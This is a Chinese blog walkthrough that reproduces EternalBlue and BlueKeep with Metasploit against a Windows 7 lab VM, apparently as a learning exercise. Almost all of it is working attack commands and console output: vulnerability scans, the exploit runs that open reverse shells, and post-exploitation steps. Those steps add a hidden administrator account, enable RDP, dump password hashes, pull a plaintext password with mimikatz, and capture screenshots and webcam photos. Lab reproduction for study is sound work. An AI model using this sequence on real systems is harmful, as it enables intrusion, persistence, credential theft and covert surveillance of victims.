使用 Metasploit-Framework 复现 EternalBlue 以及 BlueKeep。

Metasploit-Framework

Metasploit 项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。其最为知名的子项目是开源的 Metasploit 框架,一套针对远程主机进行开发和执行“exploit 代码”的工具。其他重要的子项目包括 Opcode 数据库、shellcode 档案、安全研究等内容。

在本实验中使用 Kali Linux 下的 Metasploit Framework。

Environment

  • VMware Fusion:专业版 11.1.0
  • LHOST:Kali Rolling (2019.2) x64(IP:192.168.1.109)
  • RHOST:Windows 7 SP1 旗舰版 (64 位)(IP:192.168.1.102)

EternalBlue

Intro

永恒之蓝是美国国家安全局开发的漏洞利用程序,于 2017 年 4 月 14 日被黑客组织影子掮客泄漏。该工具利用 445/TCP 端口的档案分享协议的漏洞进行散播。尽管微软于 2017 年 3 月 14 日已经发布过 Microsoft Windows 补丁修补了这个漏洞,然而在 5 月 12 日 WannaCry 勒索软体利用这个漏洞传播时,很多用户仍然因为没有安装补丁而受害。由于 WannaCry 的严重性,微软于 2017 年 5 月 13 日为已超过支持周期的 Microsoft Windows XP、Microsoft Windows 8 和 Windows Server 2003 发布了紧急安全更新,以阻止其散布造成更大的危害。

下面通过 Metasploit Framework 对 EternalBlue 进行利用。

Scan

先使用 auxiliary/scanner/smb/smb_ms17_010 模块对靶机进行扫描:

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.1.102                                                   yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.102:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.102:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploit

确定存在漏洞后使用 exploit/windows/smb/ms17_010_eternalblue 模块攻击,并得到 CMD Shell:

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.102    yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.109:4444
[+] 192.168.1.102:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.102:445 - Connecting to target for exploitation.
[+] 192.168.1.102:445 - Connection established for exploitation.
[+] 192.168.1.102:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.102:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.102:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.102:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.1.102:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.1.102:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.102:445 - Starting non-paged pool grooming
[+] 192.168.1.102:445 - Sending SMBv2 buffers
[+] 192.168.1.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.102:445 - Sending final SMBv2 buffers.
[*] 192.168.1.102:445 - Sending last fragment of exploit packet!
[*] 192.168.1.102:445 - Receiving response from exploit packet
[+] 192.168.1.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.102:445 - Sending egg to corrupted connection.
[*] 192.168.1.102:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.109:4444 -> 192.168.1.102:49161) at 2019-09-17 02:41:44 -0400
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>

BlueKeep

Intro

BlueKeep(CVE-2019-0708)是 Microsoft 远程桌面协议实现中发现的一个安全漏洞,它允许远程执行代码。首次报告于 2019 年 5 月,它存在于从 Windows 2000 到 Windows Server 2008 R2 和 Windows 7 的所有未修补的基于 Windows NT 的 Microsoft Windows 版本中。Microsoft 发布了一个安全补丁(包括几个版本的带外更新) 在 2019 年 5 月 14 日,已经达到其寿命结束的 Windows,例如 Windows XP。在 2019 年 8 月 13 日,据报道,相关的 BlueKeep 安全漏洞(统称为 DejaBlue)会影响较新的 Windows 版本,包括 Windows 7 和所有最新版本 高达 Windows 10 的操作系统,以及较旧的 Windows 版本。2019 年 9 月 6 日,Metasploit 利用可疑的 BlueKeep 安全漏洞宣布已经发布到公共领域。

下面通过 Metasploit Framework 对 BlueKeep 进行利用,具体脚本来自 Github

Scan

先使用 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 模块对靶机进行扫描:

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.1.102    yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads


Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets


msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[*] 192.168.1.102:3389    - Detected RDP on 192.168.1.102:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.102:3389    - The target is vulnerable.
[*] 192.168.1.102:3389    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploit

确定存在漏洞后使用 exploit/windows/smb/ms17_010_eternalblue 模块攻击,并得到 CMD Shell:

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.1.102    yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 192.168.1.102:3389    - Detected RDP on 192.168.1.102:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.102:3389    - The target is vulnerable.
[*] 192.168.1.102:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.1.102:3389 - Surfing channels ...
[*] 192.168.1.102:3389 - Lobbing eggs ...
[*] 192.168.1.102:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 2 opened (192.168.1.109:4444 -> 192.168.1.102:49162) at 2019-09-17 02:47:40 -0400



C:\Windows\system32>

Post Exploitation

在获取到 CMD Shell 之后可以做更多好玩的事情,比如使用 Meterpreter 进行后渗透等等,这里只记录一部分。

新建用户并进行远程连接

在得到一个 CMD Shell 后,可以新建一个用户并加入管理员组:

C:\Windows\system32>net user hacker hacker /add
net user hacker hacker /add
����ɹ���ɡ�


C:\Windows\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
����ɹ���ɡ�

开启远程连接:

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
����ɹ���ɡ�

然后使用 Kali 下的远程桌面进行连接,使用新创建的用户 hacker 登录:

rdesktop 192.168.1.102:3389
# rdesktop 192.168.1.102 -u hacker -p hacker

将普通的 CMD Shell 升级为 Meterpreter

原本的 CMD Shell 可以做的事情有限,使用 sessions 命令升级到 Meterpreter 可以做更多好玩的事。

msf5 > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x64/windows  Microsoft Windows [_ 6.1.7601] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.1.109:4444 -> 192.168.1.102:49161 (192.168.1.102)
  2         shell x64/windows  Microsoft Windows [_ 6.1.7601] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.1.109:4444 -> 192.168.1.102:49162 (192.168.1.102)

msf5 > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.1.109:4433
msf5 >
[*] Sending stage (179779 bytes) to 192.168.1.102
[*] Meterpreter session 3 opened (192.168.1.109:4433 -> 192.168.1.102:49163) at 2019-09-17 02:55:12 -0400
[*] Stopping exploit/multi/handler

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [_ 6.1.7601] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.1.109:4444 -> 192.168.1.102:49161 (192.168.1.102)
  2         shell x64/windows        Microsoft Windows [_ 6.1.7601] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.1.109:4444 -> 192.168.1.102:49162 (192.168.1.102)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-Q595JS8OROC                                             192.168.1.109:4433 -> 192.168.1.102:49163 (192.168.1.102)

多了一个 session 3,打开后得到 Meterpreter 的 Shell:

msf5 > sessions 3
[*] Starting interaction with 3...

meterpreter >

然后可以看到得到的 Meterpreter 是 32 位的,可以通过把它绑定到某个 64 位的程序(所属用户为 SYSTEM)来修改成 64 位:

meterpreter > sysinfo
Computer        : WIN-Q1ST6EBNLTR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x64   0
 100   780   audiodg.exe             x64   0
 268   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 352   344   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 404   344   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 416   396   csrss.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 420   2584  mscorsvw.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 464   396   winlogon.exe            x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 512   404   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 520   404   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 528   404   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 572   512   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 632   512   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 696   512   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 728   512   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 780   512   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 896   512   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 960   2584  mscorsvw.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 964   512   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 1096  512   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 1192  512   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1228  512   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 1240  512   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 1300  512   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 1440  512   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1464  512   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1624  512   sppsvc.exe              x64   0        NT AUTHORITY\NETWORK SERVICE
 1704  512   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 1744  512   mscorsvw.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 1768  512   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 1836  352   conhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1844  512   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 1860  632   WmiPrvSE.exe
 1984  512   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM
 2000  512   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 2084  512   VSSVC.exe               x64   0        NT AUTHORITY\SYSTEM
 2116  2424  cmd.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2192  2116  powershell.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2228  632   WmiPrvSE.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2320  512   taskhost.exe            x64   1        WIN-Q1ST6EBNLTR\victim        C:\Windows\System32\taskhost.exe
 2368  352   conhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2392  896   dwm.exe                 x64   1        WIN-Q1ST6EBNLTR\victim        C:\Windows\System32\dwm.exe
 2404  2384  explorer.exe            x64   1        WIN-Q1ST6EBNLTR\victim        C:\Windows\explorer.exe
 2424  1192  cmd.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2516  512   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 2548  512   WmiApSrv.exe            x64   0        NT AUTHORITY\SYSTEM
 2584  512   mscorsvw.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2756  512   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM
 2852  2756  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchFilterHost.exe
 2888  2756  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchProtocolHost.exe
 2968  2404  cmd.exe                 x64   1        WIN-Q1ST6EBNLTR\victim        C:\Windows\System32\cmd.exe
 2976  416   conhost.exe             x64   1        WIN-Q1ST6EBNLTR\victim        C:\Windows\System32\conhost.exe
 3060  3020  powershell.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

meterpreter > migrate 2368
[*] Migrating from 3060 to 2368...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : WIN-Q1ST6EBNLTR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

获取用户密码

利用 hashdump 可以获得所有用户密码的哈希值:

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a648199744904bf08ff1b92b5b224011...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/usr/share/metasploit-framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/share/metasploit-framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/share/metasploit-framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victim:1000:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
hacker:1001:aad3b435b51404eeaad3b435b51404ee:5e7599f673df11d5c5c4d950f5bf0157:::

使用神器 mimikatz 有可能能得到密码的明文:

meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;996     Negotiate  WORKGROUP        WIN-Q1ST6EBNLTR$
0;52252   NTLM
0;999     NTLM       WORKGROUP        WIN-Q1ST6EBNLTR$
0;333800  NTLM       WIN-Q1ST6EBNLTR  victim            admin123
0;333754  NTLM       WIN-Q1ST6EBNLTR  victim            admin123

截取屏幕

使用 screenshot 可以截取桌面实时图片:

meterpreter > screenshot
Screenshot saved to: /root/NjEXrhqY.jpeg

用摄像头拍照

使用 webcam 系列命令可以用摄像头拍照:

meterpreter > webcam_list
1: VMware Virtual USB Video Device
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/jkhYoacC.jpeg

References

https://blog.51cto.com/chenxinjie/2092754
https://mp.weixin.qq.com/s/swR4LjNJgHsx2VetyM6G5Q
https://www.anquanke.com/post/id/164525
https://zhuanlan.zhihu.com/p/25857679
https://xz.aliyun.com/t/2536
http://hardsec.net/mimikatz-meterpreter-extension/?lang=en


cve kali

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!

智能合约入门
C语言实现RC2、RC5、RC6加密解密算法